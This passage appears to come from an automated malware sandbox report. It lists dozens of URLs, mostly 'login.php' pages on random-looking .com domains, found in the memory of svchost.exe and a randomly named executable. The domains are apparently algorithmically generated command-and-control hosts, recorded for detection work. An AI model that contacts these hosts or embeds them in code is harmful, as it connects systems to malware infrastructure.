00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahykih.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2110053905.000000000D64A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahynuw.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617691262.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632882792.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyqah.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533884636.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529751923.0000000002F7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gahyzez.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galycuw.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598577017.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfez.com/login.php
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfis.com/
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549695990.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfis.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyfyb.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyhib.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2100863069.0000000009D2D000.00000004.00000010.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.00000000084F0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086E7000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2076688408.0000000009441000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://galykes.com/login.php
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1809959193.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559587168.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynab.com/login.php
Source: svchost.exe, 00000002.00000003.1487581864.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508538530.0000000008A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486308101.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486513335.0000000008B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galynuh.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galypyh.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://galyros.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganycuh.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydeh.com/http://qebyfup.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydeh.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741281252.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539362714.0000000002FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganydiw.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2606846587.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483073459.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyhus.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypih.com/http://lykyjad.com/http://lykyjad.com/http://pupybul.com/p
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypih.com/http://vonypom.com/http://volykyc.com/http://galykes.com/http://pumypog.com/http:
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.0000000009333000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.00000000087F6000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.1914326367.000000000077D000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.0000000008723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ganypih.com/login.php
Source: svchost.exe, 00000002.00000003.1587051265.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1588374175.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganypis.com/H
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqib.com/login.php
Source: svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyqyh.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716704828.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrew.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433180405.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432691608.0000000002F7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrys.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyrys.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1930409487.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyvyw.com/http://vojyrum.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ganyzuz.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqydeb.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqydeb.com/login.phpal
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyfub.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142459408.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716704828.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615554415.0000000002F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqykoz.com/login.php
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552621926.0000000002F8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552121773.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1557763766.0000000002F8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqykus.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1568256894.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqynih.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqynih.com/http://vonygit.com/H
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529606311.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529645254.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724324245.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqynyw.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqypuh.com/login.php
